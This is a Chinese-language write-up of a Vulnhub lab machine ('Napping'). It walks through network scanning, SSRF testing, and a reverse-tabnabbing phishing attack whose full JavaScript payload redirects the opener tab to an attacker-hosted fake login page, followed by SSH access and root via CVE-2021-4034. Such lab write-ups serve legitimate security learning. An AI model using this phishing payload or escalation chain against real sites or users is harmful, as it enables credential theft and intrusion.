記一次釣魚靶機測試

• 2022 年 2 月 28 日
• 筆記
• Vulnhub靶機系列

Napping

​

攻擊機kali：192.168.0.105

靶機：192.168.0.103（使用virtualbox搭建）

下載地址：//download.vulnhub.com/napping/napping-1.0.1.ova

一 · 靶機的發現與資訊搜集：

使用 networkdiscover 掃描當前網段，發現靶機ip為 192.168.0.103

networkdiscover -i eth0 -r 192.168.0.0/24

獲取ip地址後掃描當前靶機開放埠，發現僅開放 22、80埠

nmap -p1-65535 -sV -n -A  192.168.0.103

掃描當前站點web目錄，沒有找到特別的發現。開始在網站的功能點上尋找漏洞

[09:23:44] 200 -    0B  - /config.php
[09:23:48] 200 -    1KB - /index.php
[09:23:48] 200 -    1KB - /index.php/login/
[09:23:50] 302 -    0B  - /logout.php  ->  index.php
[09:23:55] 200 -    2KB - /register.php
[09:23:56] 403 -  278B  - /server-status

訪問當前靶機80埠，註冊後發現站點是一個部落格推廣網站，中間部分能填寫當前部落格的網址。

還有一個重置密碼和一個登出的按鈕，咱留著後面再試

填寫鏈接後點擊按鈕會打開新標籤頁到填寫鏈接的地址,使用 dnslog 測試後發現存在ssrf

二 · 漏洞發現

1 · 對管理員的釣魚

（1）查看頁面源碼

描述中說到了，所有提交的鏈接都將由管理員審核。是否就意味著管理員會查看提交的 URL 所指向的內容。

查看頁面源碼發現應存在一處 Tab Nabbing 漏洞。下面是一個網上找到的比較通俗易懂的解釋：//kebingzao.com/2020/05/14/a-target-blank/

再來看靶機頁面的源碼，target=”_bank” 說明了此處確實是有可能存在這一個漏洞的。

（2）開始釣魚

​ 使用wget 把登錄頁面的源碼下載下來，然後再製作一個惡意鏈接。

wget //192.168.0.103/index.php

​ 我們將惡意的偽造頁面保存為 index.html ，將含有惡意 js 程式碼的頁面保存為 evil.html

	釣魚頁面源碼：
<!DOCTYPE html>
<html>
    <head>
        <title>My Blog</title>
    </head>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('//192.168.0.104/index.html');
        if(window.opener  != window) window.opener.parent.location.replace('//192.168.0.104/index.html');
</script>
</body>
</html>

隨後將兩個頁面分別放進 /var/www/html 文件夾下，並使用python3開啟 80 埠web服務

python3 -m http.server 80

將鏈接放在 blog link 框中後，在運行 web服務的主機上使用監聽程式監聽流量（這裡打錯了，應該是 192.168.0.105）

​

成功使用 wireshark 看到魚兒上鉤了

​

三 · 獲取shell並提權

使用獲取的帳號密碼登錄 站點後台，發現密碼錯誤。而後登錄 ssh 成功連接。

上傳提權輔助腳本，下載地址：//github.com/mzet-/linux-exploit-suggester

成功使用 CVE-2021-4034 提權為root，並進入 root目錄